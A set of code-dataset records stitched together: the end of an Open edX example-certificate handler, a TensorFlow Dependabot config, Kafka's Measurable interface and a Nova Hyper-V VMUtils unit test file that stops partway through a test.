        # so we can display the example certificate.
        download_url = xqueue_body.get('url')
        if download_url is None:
            rate_limiter.tick_bad_request_counter(request)
            log.warning(u"No download URL provided for example certificate with uuid '%s'.", uuid)
            return JsonResponseBadRequest(
                "Parameter 'download_url' is required for successfully generated certificates."
            )
        else:
            cert.update_status(ExampleCertificate.STATUS_SUCCESS, download_url=download_url)
            log.info("Successfully updated example certificate with uuid '%s'.", uuid)

    # Let the XQueue know that we handled the response
    return JsonResponse({'return_code': 0})
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright 2024 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
version: 2
updates:
- package-ecosystem: github-actions
directory: /
schedule:
interval: monthly
groups:
github-actions:
patterns:
- "*"
- package-ecosystem: docker
directory: /ci/devinfra/docker_windows
schedule:
interval: monthly
ignore:
- dependency-name: "*"
update-types: ["version-update:semver-major", "version-update:semver-minor"]
- package-ecosystem: docker
directory: /tensorflow/tools/gcs_test
schedule:
interval: monthly
- package-ecosystem: docker
directory: /tensorflow/tools/tf_sig_build_dockerfiles
schedule:
interval: monthly
ignore:
- dependency-name: "*"
update-types: ["version-update:semver-major", "version-update:semver-minor"]
|
unknown
|
github
|
https://github.com/tensorflow/tensorflow
|
.github/dependabot.yml
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.common.metrics;

/**
 * A measurable quantity that can be registered as a metric
 */
public interface Measurable extends MetricValueProvider<Double> {

    /**
     * Measure this quantity and return the result as a double.
     *
     * @param config The configuration for this metric
     * @param now The POSIX time in milliseconds the measurement is being taken
     * @return The measured value
     */
    double measure(MetricConfig config, long now);

    /**
     * Measure this quantity and return the result as a double.
     *
     * This default implementation delegates to {@link #measure(MetricConfig, long)},
     * auto-boxing the primitive result, so implementors only need to provide
     * {@code measure}.
     *
     * @param config The configuration for this metric
     * @param now The POSIX time in milliseconds the measurement is being taken
     * @return The measured value as a {@link Double}
     */
    @Override
    default Double value(MetricConfig config, long now) {
        return measure(config, now);
    }
}
|
java
|
github
|
https://github.com/apache/kafka
|
clients/src/main/java/org/apache/kafka/common/metrics/Measurable.java
|
# Copyright 2014 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from six.moves import range
from nova import exception
from nova import test
from nova.virt.hyperv import constants
from nova.virt.hyperv import vmutils
class VMUtilsTestCase(test.NoDBTestCase):
"""Unit tests for the Hyper-V VMUtils class."""
# Fixture constants shared by the test methods below.
_FAKE_VM_NAME = 'fake_vm'
_FAKE_MEMORY_MB = 2
_FAKE_VCPUS_NUM = 4
_FAKE_JOB_PATH = 'fake_job_path'
_FAKE_RET_VAL = 0
_FAKE_RET_VAL_BAD = -1
_FAKE_PATH = "fake_path"
_FAKE_CTRL_PATH = 'fake_ctrl_path'
_FAKE_CTRL_ADDR = 0
_FAKE_DRIVE_ADDR = 0
_FAKE_MOUNTED_DISK_PATH = 'fake_mounted_disk_path'
_FAKE_VM_PATH = "fake_vm_path"
_FAKE_VHD_PATH = "fake_vhd_path"
_FAKE_DVD_PATH = "fake_dvd_path"
_FAKE_VOLUME_DRIVE_PATH = "fake_volume_drive_path"
_FAKE_VM_UUID = "04e79212-39bc-4065-933c-50f6d48a57f6"
_FAKE_INSTANCE = {"name": _FAKE_VM_NAME,
                  "uuid": _FAKE_VM_UUID}
_FAKE_SNAPSHOT_PATH = "fake_snapshot_path"
_FAKE_RES_DATA = "fake_res_data"
_FAKE_HOST_RESOURCE = "fake_host_resource"
_FAKE_CLASS = "FakeClass"
_FAKE_RES_PATH = "fake_res_path"
_FAKE_RES_NAME = 'fake_res_name'
_FAKE_ADDRESS = "fake_address"
_FAKE_JOB_STATUS_DONE = 7
_FAKE_JOB_STATUS_BAD = -1
_FAKE_JOB_DESCRIPTION = "fake_job_description"
_FAKE_ERROR = "fake_error"
_FAKE_ELAPSED_TIME = 0
_CONCRETE_JOB = "Msvm_ConcreteJob"
_FAKE_DYNAMIC_MEMORY_RATIO = 1.0
_FAKE_SUMMARY_INFO = {'NumberOfProcessors': 4,
                      'EnabledState': 2,
                      'MemoryUsage': 2,
                      'UpTime': 1}
# WMI method names looked up via getattr on the mocked management service
# (see test_create_vm which uses _DEFINE_SYSTEM this way).
_DEFINE_SYSTEM = 'DefineVirtualSystem'
_DESTROY_SYSTEM = 'DestroyVirtualSystem'
_DESTROY_SNAPSHOT = 'RemoveVirtualSystemSnapshot'
_ADD_RESOURCE = 'AddVirtualSystemResources'
_REMOVE_RESOURCE = 'RemoveVirtualSystemResources'
_SETTING_TYPE = 'SettingType'
_VM_GEN = constants.VM_GEN_1
_VIRTUAL_SYSTEM_TYPE_REALIZED = 3
def setUp(self):
    """Create a VMUtils instance whose WMI connection is a MagicMock."""
    self._vmutils = vmutils.VMUtils()
    self._vmutils._conn = mock.MagicMock()
    super(VMUtilsTestCase, self).setUp()
def test_enable_vm_metrics_collection(self):
    """Metrics collection is unimplemented in this utils class."""
    self.assertRaises(NotImplementedError,
                      self._vmutils.enable_vm_metrics_collection,
                      self._FAKE_VM_NAME)
def test_get_vm_summary_info(self):
    """get_vm_summary_info returns the WMI summary fields as a dict."""
    self._lookup_vm()
    mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
    mock_summary = mock.MagicMock()
    mock_svc.GetSummaryInformation.return_value = (self._FAKE_RET_VAL,
                                                   [mock_summary])
    # Populate the mock summary object with the expected attributes.
    for (key, val) in self._FAKE_SUMMARY_INFO.items():
        setattr(mock_summary, key, val)
    summary = self._vmutils.get_vm_summary_info(self._FAKE_VM_NAME)
    self.assertEqual(self._FAKE_SUMMARY_INFO, summary)
def _lookup_vm(self):
    """Helper: stub _lookup_vm_check to return a mock VM.

    The mock's path_() returns _FAKE_VM_PATH so callers can assert on it.
    """
    mock_vm = mock.MagicMock()
    self._vmutils._lookup_vm_check = mock.MagicMock(
        return_value=mock_vm)
    mock_vm.path_.return_value = self._FAKE_VM_PATH
    return mock_vm
def test_lookup_vm_ok(self):
    """A single matching Msvm_ComputerSystem is returned as-is."""
    mock_vm = mock.MagicMock()
    self._vmutils._conn.Msvm_ComputerSystem.return_value = [mock_vm]
    vm = self._vmutils._lookup_vm_check(self._FAKE_VM_NAME)
    self.assertEqual(mock_vm, vm)
def test_lookup_vm_multiple(self):
    """Duplicate VM matches raise HyperVException."""
    mockvm = mock.MagicMock()
    self._vmutils._conn.Msvm_ComputerSystem.return_value = [mockvm, mockvm]
    self.assertRaises(vmutils.HyperVException,
                      self._vmutils._lookup_vm_check,
                      self._FAKE_VM_NAME)
def test_lookup_vm_none(self):
    """No VM match raises NotFound."""
    self._vmutils._conn.Msvm_ComputerSystem.return_value = []
    self.assertRaises(exception.NotFound,
                      self._vmutils._lookup_vm_check,
                      self._FAKE_VM_NAME)
def test_set_vm_memory_static(self):
    """Ratio 1.0 means static memory (dynamic memory disabled)."""
    self._test_set_vm_memory_dynamic(1.0)
def test_set_vm_memory_dynamic(self):
    """Ratio > 1 enables dynamic memory."""
    self._test_set_vm_memory_dynamic(2.0)
def _test_set_vm_memory_dynamic(self, dynamic_memory_ratio):
    """Shared check: _set_vm_memory modifies the memory setting resource
    and toggles DynamicMemoryEnabled based on the ratio."""
    mock_vm = self._lookup_vm()
    mock_s = self._vmutils._conn.Msvm_VirtualSystemSettingData()[0]
    mock_s.SystemType = 3
    mock_vmsetting = mock.MagicMock()
    mock_vmsetting.associators.return_value = [mock_s]
    self._vmutils._modify_virt_resource = mock.MagicMock()
    self._vmutils._set_vm_memory(mock_vm, mock_vmsetting,
                                 self._FAKE_MEMORY_MB,
                                 dynamic_memory_ratio)
    self._vmutils._modify_virt_resource.assert_called_with(
        mock_s, self._FAKE_VM_PATH)
    if dynamic_memory_ratio > 1:
        self.assertTrue(mock_s.DynamicMemoryEnabled)
    else:
        self.assertFalse(mock_s.DynamicMemoryEnabled)
def test_soft_shutdown_vm(self):
    """soft_shutdown_vm calls InitiateShutdown and checks its return."""
    mock_vm = self._lookup_vm()
    mock_shutdown = mock.MagicMock()
    mock_shutdown.InitiateShutdown.return_value = (self._FAKE_RET_VAL, )
    mock_vm.associators.return_value = [mock_shutdown]
    with mock.patch.object(self._vmutils, 'check_ret_val') as mock_check:
        self._vmutils.soft_shutdown_vm(self._FAKE_VM_NAME)
        mock_shutdown.InitiateShutdown.assert_called_once_with(
            Force=False, Reason=mock.ANY)
        mock_check.assert_called_once_with(self._FAKE_RET_VAL, None)
def test_soft_shutdown_vm_no_component(self):
    """Without a shutdown component, soft_shutdown_vm is a no-op."""
    mock_vm = self._lookup_vm()
    mock_vm.associators.return_value = []
    with mock.patch.object(self._vmutils, 'check_ret_val') as mock_check:
        self._vmutils.soft_shutdown_vm(self._FAKE_VM_NAME)
        self.assertFalse(mock_check.called)
@mock.patch('nova.virt.hyperv.vmutils.VMUtils._get_vm_disks')
def test_get_vm_storage_paths(self, mock_get_vm_disks):
    """get_vm_storage_paths splits disks into file paths and volume drives."""
    self._lookup_vm()
    mock_rasds = self._create_mock_disks()
    mock_get_vm_disks.return_value = ([mock_rasds[0]], [mock_rasds[1]])
    storage = self._vmutils.get_vm_storage_paths(self._FAKE_VM_NAME)
    (disk_files, volume_drives) = storage
    self.assertEqual([self._FAKE_VHD_PATH], disk_files)
    self.assertEqual([self._FAKE_VOLUME_DRIVE_PATH], volume_drives)
def test_get_vm_disks(self):
    """_get_vm_disks walks VM -> settings -> resource allocations and
    partitions them into (disks, volumes)."""
    mock_vm = self._lookup_vm()
    mock_vmsettings = [mock.MagicMock()]
    mock_vm.associators.return_value = mock_vmsettings
    mock_rasds = self._create_mock_disks()
    mock_vmsettings[0].associators.return_value = mock_rasds
    (disks, volumes) = self._vmutils._get_vm_disks(mock_vm)
    mock_vm.associators.assert_called_with(
        wmi_result_class=self._vmutils._VIRTUAL_SYSTEM_SETTING_DATA_CLASS)
    mock_vmsettings[0].associators.assert_called_with(
        wmi_result_class=self._vmutils._RESOURCE_ALLOC_SETTING_DATA_CLASS)
    self.assertEqual([mock_rasds[0]], disks)
    self.assertEqual([mock_rasds[1]], volumes)
def _create_mock_disks(self):
    """Helper: build one hard-disk RASD and one physical-disk RASD mock."""
    mock_rasd1 = mock.MagicMock()
    mock_rasd1.ResourceSubType = self._vmutils._HARD_DISK_RES_SUB_TYPE
    mock_rasd1.HostResource = [self._FAKE_VHD_PATH]
    mock_rasd1.Connection = [self._FAKE_VHD_PATH]
    mock_rasd1.Parent = self._FAKE_CTRL_PATH
    mock_rasd1.Address = self._FAKE_ADDRESS
    # NOTE(review): duplicate HostResource assignment kept as-is.
    mock_rasd1.HostResource = [self._FAKE_VHD_PATH]
    mock_rasd2 = mock.MagicMock()
    mock_rasd2.ResourceSubType = self._vmutils._PHYS_DISK_RES_SUB_TYPE
    mock_rasd2.HostResource = [self._FAKE_VOLUME_DRIVE_PATH]
    return [mock_rasd1, mock_rasd2]
@mock.patch.object(vmutils.VMUtils, '_set_vm_vcpus')
@mock.patch.object(vmutils.VMUtils, '_set_vm_memory')
@mock.patch.object(vmutils.VMUtils, '_get_wmi_obj')
def test_create_vm(self, mock_get_wmi_obj, mock_set_mem, mock_set_vcpus):
    """create_vm defines the system via WMI and configures memory/vcpus."""
    mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
    # The V1 method name is looked up dynamically via _DEFINE_SYSTEM.
    getattr(mock_svc, self._DEFINE_SYSTEM).return_value = (
        None, self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
    mock_vm = mock_get_wmi_obj.return_value
    self._vmutils._conn.Msvm_ComputerSystem.return_value = [mock_vm]
    mock_s = mock.MagicMock()
    setattr(mock_s,
            self._SETTING_TYPE,
            self._VIRTUAL_SYSTEM_TYPE_REALIZED)
    mock_vm.associators.return_value = [mock_s]
    self._vmutils.create_vm(self._FAKE_VM_NAME, self._FAKE_MEMORY_MB,
                            self._FAKE_VCPUS_NUM, False,
                            self._FAKE_DYNAMIC_MEMORY_RATIO,
                            self._VM_GEN,
                            mock.sentinel.instance_path)
    self.assertTrue(getattr(mock_svc, self._DEFINE_SYSTEM).called)
    mock_set_mem.assert_called_with(mock_vm, mock_s, self._FAKE_MEMORY_MB,
                                    self._FAKE_DYNAMIC_MEMORY_RATIO)
    mock_set_vcpus.assert_called_with(mock_vm, mock_s,
                                      self._FAKE_VCPUS_NUM,
                                      False)
def test_get_vm_scsi_controller(self):
    """get_vm_scsi_controller returns the SCSI controller resource path."""
    self._prepare_get_vm_controller(self._vmutils._SCSI_CTRL_RES_SUB_TYPE)
    path = self._vmutils.get_vm_scsi_controller(self._FAKE_VM_NAME)
    self.assertEqual(self._FAKE_RES_PATH, path)
@mock.patch("nova.virt.hyperv.vmutils.VMUtils.get_attached_disks")
def test_get_free_controller_slot(self, mock_get_attached_disks):
    """The first slot not occupied by an attached disk is returned (0 here,
    since the only attached disk sits at address 3)."""
    with mock.patch.object(self._vmutils,
                           '_get_disk_resource_address') as mock_get_addr:
        mock_get_addr.return_value = 3
        mock_get_attached_disks.return_value = [mock.sentinel.disk]
        response = self._vmutils.get_free_controller_slot(
            self._FAKE_CTRL_PATH)
        mock_get_attached_disks.assert_called_once_with(
            self._FAKE_CTRL_PATH)
        self.assertEqual(response, 0)
def test_get_free_controller_slot_exception(self):
    """A fully occupied SCSI controller raises HyperVException."""
    mock_get_address = mock.Mock()
    mock_get_address.side_effect = range(
        constants.SCSI_CONTROLLER_SLOTS_NUMBER)
    mock_get_attached_disks = mock.Mock()
    # One attached drive per slot -> no free slot remains.
    mock_get_attached_disks.return_value = (
        [mock.sentinel.drive] * constants.SCSI_CONTROLLER_SLOTS_NUMBER)
    with mock.patch.multiple(self._vmutils,
                             get_attached_disks=mock_get_attached_disks,
                             _get_disk_resource_address=mock_get_address):
        self.assertRaises(vmutils.HyperVException,
                          self._vmutils.get_free_controller_slot,
                          mock.sentinel.scsi_controller_path)
def test_get_vm_ide_controller(self):
    """get_vm_ide_controller returns the path for a matching address."""
    self._prepare_get_vm_controller(self._vmutils._IDE_CTRL_RES_SUB_TYPE)
    path = self._vmutils.get_vm_ide_controller(self._FAKE_VM_NAME,
                                               self._FAKE_ADDRESS)
    self.assertEqual(self._FAKE_RES_PATH, path)
def test_get_vm_ide_controller_none(self):
    """A non-matching address does not yield the fake resource path."""
    self._prepare_get_vm_controller(self._vmutils._IDE_CTRL_RES_SUB_TYPE)
    path = self._vmutils.get_vm_ide_controller(
        mock.sentinel.FAKE_VM_NAME, mock.sentinel.FAKE_NOT_FOUND_ADDR)
    self.assertNotEqual(self._FAKE_RES_PATH, path)
def _prepare_get_vm_controller(self, resource_sub_type):
    """Helper: wire up a mock VM whose settings expose one controller RASD
    of the given resource sub type at _FAKE_ADDRESS/_FAKE_RES_PATH."""
    mock_vm = self._lookup_vm()
    mock_vm_settings = mock.MagicMock()
    mock_rasds = mock.MagicMock()
    mock_rasds.path_.return_value = self._FAKE_RES_PATH
    mock_rasds.ResourceSubType = resource_sub_type
    mock_rasds.Address = self._FAKE_ADDRESS
    mock_vm_settings.associators.return_value = [mock_rasds]
    mock_vm.associators.return_value = [mock_vm_settings]
def _prepare_resources(self, mock_path, mock_subtype, mock_vm_settings):
    """Helper: configure and return the first RASD associated with the
    given settings mock."""
    mock_rasds = mock_vm_settings.associators.return_value[0]
    mock_rasds.path_.return_value = mock_path
    mock_rasds.ResourceSubType = mock_subtype
    return mock_rasds
@mock.patch("nova.virt.hyperv.vmutils.VMUtils.get_free_controller_slot")
@mock.patch("nova.virt.hyperv.vmutils.VMUtils._get_vm_scsi_controller")
def test_attach_scsi_drive(self, mock_get_vm_scsi_controller,
                           mock_get_free_controller_slot):
    """attach_scsi_drive resolves controller and slot, then delegates to
    attach_drive."""
    mock_vm = self._lookup_vm()
    mock_get_vm_scsi_controller.return_value = self._FAKE_CTRL_PATH
    mock_get_free_controller_slot.return_value = self._FAKE_DRIVE_ADDR
    with mock.patch.object(self._vmutils,
                           'attach_drive') as mock_attach_drive:
        self._vmutils.attach_scsi_drive(mock_vm, self._FAKE_PATH,
                                        constants.DISK)
        mock_get_vm_scsi_controller.assert_called_once_with(mock_vm)
        mock_get_free_controller_slot.assert_called_once_with(
            self._FAKE_CTRL_PATH)
        mock_attach_drive.assert_called_once_with(
            mock_vm, self._FAKE_PATH, self._FAKE_CTRL_PATH,
            self._FAKE_DRIVE_ADDR, constants.DISK)
@mock.patch.object(vmutils.VMUtils, '_get_new_resource_setting_data')
@mock.patch.object(vmutils.VMUtils, '_get_vm_ide_controller')
def test_attach_ide_drive(self, mock_get_ide_ctrl, mock_get_new_rsd):
    """attach_ide_drive builds a new RSD and adds it to the VM."""
    mock_vm = self._lookup_vm()
    mock_rsd = mock_get_new_rsd.return_value
    with mock.patch.object(self._vmutils,
                           '_add_virt_resource') as mock_add_virt_res:
        self._vmutils.attach_ide_drive(self._FAKE_VM_NAME,
                                       self._FAKE_CTRL_PATH,
                                       self._FAKE_CTRL_ADDR,
                                       self._FAKE_DRIVE_ADDR)
        mock_add_virt_res.assert_called_with(mock_rsd,
                                             mock_vm.path_.return_value)
    mock_get_ide_ctrl.assert_called_with(mock_vm, self._FAKE_CTRL_ADDR)
    self.assertTrue(mock_get_new_rsd.called)
@mock.patch.object(vmutils.VMUtils, '_get_new_resource_setting_data')
def test_create_scsi_controller(self, mock_get_new_rsd):
mock_vm = self._lookup_vm()
with mock.patch.object(self._vmutils,
'_add_virt_resource') as mock_add_virt_res:
self._vmutils.create_scsi_controller(self._FAKE_VM_NAME)
mock_add_virt_res.assert_called_with(mock_get_new_rsd.return_value,
mock_vm.path_.return_value)
@mock.patch.object(vmutils.VMUtils, '_get_new_resource_setting_data')
def test_attach_volume_to_controller(self, mock_get_new_rsd):
mock_vm = self._lookup_vm()
with mock.patch.object(self._vmutils,
'_add_virt_resource') as mock_add_virt_res:
self._vmutils.attach_volume_to_controller(
self._FAKE_VM_NAME, self._FAKE_CTRL_PATH, self._FAKE_CTRL_ADDR,
self._FAKE_MOUNTED_DISK_PATH)
mock_add_virt_res.assert_called_with(mock_get_new_rsd.return_value,
mock_vm.path_.return_value)
@mock.patch.object(vmutils.VMUtils, '_modify_virt_resource')
@mock.patch.object(vmutils.VMUtils, '_get_nic_data_by_name')
def test_set_nic_connection(self, mock_get_nic_conn, mock_modify_virt_res):
self._lookup_vm()
mock_nic = mock_get_nic_conn.return_value
self._vmutils.set_nic_connection(self._FAKE_VM_NAME, None, None)
mock_modify_virt_res.assert_called_with(mock_nic, self._FAKE_VM_PATH)
@mock.patch.object(vmutils.VMUtils, '_get_new_setting_data')
def test_create_nic(self, mock_get_new_virt_res):
self._lookup_vm()
mock_nic = mock_get_new_virt_res.return_value
with mock.patch.object(self._vmutils,
'_add_virt_resource') as mock_add_virt_res:
self._vmutils.create_nic(
self._FAKE_VM_NAME, self._FAKE_RES_NAME, self._FAKE_ADDRESS)
mock_add_virt_res.assert_called_with(mock_nic, self._FAKE_VM_PATH)
def test_set_vm_state(self):
mock_vm = self._lookup_vm()
mock_vm.RequestStateChange.return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
self._vmutils.set_vm_state(self._FAKE_VM_NAME,
constants.HYPERV_VM_STATE_ENABLED)
mock_vm.RequestStateChange.assert_called_with(
constants.HYPERV_VM_STATE_ENABLED)
def test_destroy_vm(self):
self._lookup_vm()
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
getattr(mock_svc, self._DESTROY_SYSTEM).return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
self._vmutils.destroy_vm(self._FAKE_VM_NAME)
getattr(mock_svc, self._DESTROY_SYSTEM).assert_called_with(
self._FAKE_VM_PATH)
@mock.patch.object(vmutils.VMUtils, '_wait_for_job')
def test_check_ret_val_ok(self, mock_wait_for_job):
self._vmutils.check_ret_val(constants.WMI_JOB_STATUS_STARTED,
self._FAKE_JOB_PATH)
mock_wait_for_job.assert_called_once_with(self._FAKE_JOB_PATH)
def test_check_ret_val_exception(self):
self.assertRaises(vmutils.HyperVException,
self._vmutils.check_ret_val,
self._FAKE_RET_VAL_BAD,
self._FAKE_JOB_PATH)
def test_wait_for_job_done(self):
mockjob = self._prepare_wait_for_job(constants.WMI_JOB_STATE_COMPLETED)
job = self._vmutils._wait_for_job(self._FAKE_JOB_PATH)
self.assertEqual(mockjob, job)
def test_wait_for_job_exception_concrete_job(self):
mock_job = self._prepare_wait_for_job()
mock_job.path.return_value.Class = self._CONCRETE_JOB
self.assertRaises(vmutils.HyperVException,
self._vmutils._wait_for_job,
self._FAKE_JOB_PATH)
def test_wait_for_job_exception_with_error(self):
mock_job = self._prepare_wait_for_job()
mock_job.GetError.return_value = (self._FAKE_ERROR, self._FAKE_RET_VAL)
self.assertRaises(vmutils.HyperVException,
self._vmutils._wait_for_job,
self._FAKE_JOB_PATH)
def test_wait_for_job_exception_no_error(self):
mock_job = self._prepare_wait_for_job()
mock_job.GetError.return_value = (None, None)
self.assertRaises(vmutils.HyperVException,
self._vmutils._wait_for_job,
self._FAKE_JOB_PATH)
def _prepare_wait_for_job(self, state=_FAKE_JOB_STATUS_BAD):
mock_job = mock.MagicMock()
mock_job.JobState = state
mock_job.Description = self._FAKE_JOB_DESCRIPTION
mock_job.ElapsedTime = self._FAKE_ELAPSED_TIME
self._vmutils._get_wmi_obj = mock.MagicMock(return_value=mock_job)
return mock_job
def test_add_virt_resource(self):
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
getattr(mock_svc, self._ADD_RESOURCE).return_value = (
self._FAKE_JOB_PATH, mock.MagicMock(), self._FAKE_RET_VAL)
mock_res_setting_data = mock.MagicMock()
mock_res_setting_data.GetText_.return_value = self._FAKE_RES_DATA
self._vmutils._add_virt_resource(mock_res_setting_data,
self._FAKE_VM_PATH)
self._assert_add_resources(mock_svc)
def test_modify_virt_resource(self):
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
mock_svc.ModifyVirtualSystemResources.return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
mock_res_setting_data = mock.MagicMock()
mock_res_setting_data.GetText_.return_value = self._FAKE_RES_DATA
self._vmutils._modify_virt_resource(mock_res_setting_data,
self._FAKE_VM_PATH)
mock_svc.ModifyVirtualSystemResources.assert_called_with(
ResourceSettingData=[self._FAKE_RES_DATA],
ComputerSystem=self._FAKE_VM_PATH)
def test_remove_virt_resource(self):
mock_svc = self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
getattr(mock_svc, self._REMOVE_RESOURCE).return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
mock_res_setting_data = mock.MagicMock()
mock_res_setting_data.path_.return_value = self._FAKE_RES_PATH
self._vmutils._remove_virt_resource(mock_res_setting_data,
self._FAKE_VM_PATH)
self._assert_remove_resources(mock_svc)
def test_set_disk_host_resource(self):
self._lookup_vm()
mock_rasds = self._create_mock_disks()
self._vmutils._get_vm_disks = mock.MagicMock(
return_value=([mock_rasds[0]], [mock_rasds[1]]))
self._vmutils._modify_virt_resource = mock.MagicMock()
self._vmutils._get_disk_resource_address = mock.MagicMock(
return_value=self._FAKE_ADDRESS)
self._vmutils.set_disk_host_resource(
self._FAKE_VM_NAME,
self._FAKE_CTRL_PATH,
self._FAKE_ADDRESS,
mock.sentinel.fake_new_mounted_disk_path)
self._vmutils._get_disk_resource_address.assert_called_with(
mock_rasds[0])
self._vmutils._modify_virt_resource.assert_called_with(
mock_rasds[0], self._FAKE_VM_PATH)
self.assertEqual(
mock.sentinel.fake_new_mounted_disk_path,
mock_rasds[0].HostResource[0])
@mock.patch.object(vmutils, 'wmi', create=True)
@mock.patch.object(vmutils.VMUtils, 'check_ret_val')
def test_take_vm_snapshot(self, mock_check_ret_val, mock_wmi):
self._lookup_vm()
mock_svc = self._get_snapshot_service()
mock_svc.CreateVirtualSystemSnapshot.return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL, mock.MagicMock())
self._vmutils.take_vm_snapshot(self._FAKE_VM_NAME)
mock_svc.CreateVirtualSystemSnapshot.assert_called_with(
self._FAKE_VM_PATH)
mock_check_ret_val.assert_called_once_with(self._FAKE_RET_VAL,
self._FAKE_JOB_PATH)
def test_remove_vm_snapshot(self):
mock_svc = self._get_snapshot_service()
getattr(mock_svc, self._DESTROY_SNAPSHOT).return_value = (
self._FAKE_JOB_PATH, self._FAKE_RET_VAL)
self._vmutils.remove_vm_snapshot(self._FAKE_SNAPSHOT_PATH)
getattr(mock_svc, self._DESTROY_SNAPSHOT).assert_called_with(
self._FAKE_SNAPSHOT_PATH)
def test_detach_vm_disk(self):
self._lookup_vm()
mock_disk = self._prepare_mock_disk()
with mock.patch.object(self._vmutils,
'_remove_virt_resource') as mock_rm_virt_res:
self._vmutils.detach_vm_disk(self._FAKE_VM_NAME,
self._FAKE_HOST_RESOURCE)
mock_rm_virt_res.assert_called_with(mock_disk, self._FAKE_VM_PATH)
def _test_get_mounted_disk_resource_from_path(self, is_physical):
mock_disk_1 = mock.MagicMock()
mock_disk_2 = mock.MagicMock()
conn_attr = (self._vmutils._PHYS_DISK_CONNECTION_ATTR if is_physical
else self._vmutils._VIRT_DISK_CONNECTION_ATTR)
setattr(mock_disk_2, conn_attr, [self._FAKE_MOUNTED_DISK_PATH])
self._vmutils._conn.query.return_value = [mock_disk_1, mock_disk_2]
mounted_disk = self._vmutils._get_mounted_disk_resource_from_path(
self._FAKE_MOUNTED_DISK_PATH, is_physical)
self.assertEqual(mock_disk_2, mounted_disk)
def test_get_physical_mounted_disk_resource_from_path(self):
self._test_get_mounted_disk_resource_from_path(is_physical=True)
def test_get_virtual_mounted_disk_resource_from_path(self):
self._test_get_mounted_disk_resource_from_path(is_physical=False)
def test_get_controller_volume_paths(self):
self._prepare_mock_disk()
mock_disks = {self._FAKE_RES_PATH: self._FAKE_HOST_RESOURCE}
disks = self._vmutils.get_controller_volume_paths(self._FAKE_RES_PATH)
self.assertEqual(mock_disks, disks)
def _prepare_mock_disk(self):
mock_disk = mock.MagicMock()
mock_disk.HostResource = [self._FAKE_HOST_RESOURCE]
mock_disk.path.return_value.RelPath = self._FAKE_RES_PATH
mock_disk.ResourceSubType = self._vmutils._HARD_DISK_RES_SUB_TYPE
self._vmutils._conn.query.return_value = [mock_disk]
return mock_disk
def _get_snapshot_service(self):
return self._vmutils._conn.Msvm_VirtualSystemManagementService()[0]
def _assert_add_resources(self, mock_svc):
getattr(mock_svc, self._ADD_RESOURCE).assert_called_with(
[self._FAKE_RES_DATA], self._FAKE_VM_PATH)
def _assert_remove_resources(self, mock_svc):
getattr(mock_svc, self._REMOVE_RESOURCE).assert_called_with(
[self._FAKE_RES_PATH], self._FAKE_VM_PATH)
def test_get_active_instances(self):
fake_vm = mock.MagicMock()
type(fake_vm).ElementName = mock.PropertyMock(
side_effect=['active_vm', 'inactive_vm'])
type(fake_vm).EnabledState = mock.PropertyMock(
side_effect=[constants.HYPERV_VM_STATE_ENABLED,
constants.HYPERV_VM_STATE_DISABLED])
self._vmutils.list_instances = mock.MagicMock(
return_value=[mock.sentinel.fake_vm_name] * 2)
self._vmutils._lookup_vm = mock.MagicMock(side_effect=[fake_vm] * 2)
active_instances = self._vmutils.get_active_instances()
self.assertEqual(['active_vm'], active_instances)
def _test_get_vm_serial_port_connection(self, new_connection=None):
old_serial_connection = 'old_serial_connection'
mock_vm = self._lookup_vm()
mock_vmsettings = [mock.MagicMock()]
mock_vm.associators.return_value = mock_vmsettings
fake_serial_port = mock.MagicMock()
fake_serial_port.ResourceSubType = (
self._vmutils._SERIAL_PORT_RES_SUB_TYPE)
fake_serial_port.Connection = [old_serial_connection]
mock_rasds = [fake_serial_port]
mock_vmsettings[0].associators.return_value = mock_rasds
self._vmutils._modify_virt_resource = mock.MagicMock()
fake_modify = self._vmutils._modify_virt_resource
ret_val = self._vmutils.get_vm_serial_port_connection(
self._FAKE_VM_NAME, update_connection=new_connection)
mock_vmsettings[0].associators.assert_called_once_with(
wmi_result_class=self._vmutils._SERIAL_PORT_SETTING_DATA_CLASS)
if new_connection:
self.assertEqual(new_connection, ret_val)
fake_modify.assert_called_once_with(fake_serial_port,
mock_vm.path_())
else:
self.assertEqual(old_serial_connection, ret_val)
def test_set_vm_serial_port_connection(self):
self._test_get_vm_serial_port_connection('new_serial_connection')
def test_get_vm_serial_port_connection(self):
self._test_get_vm_serial_port_connection()
def test_list_instance_notes(self):
vs = mock.MagicMock()
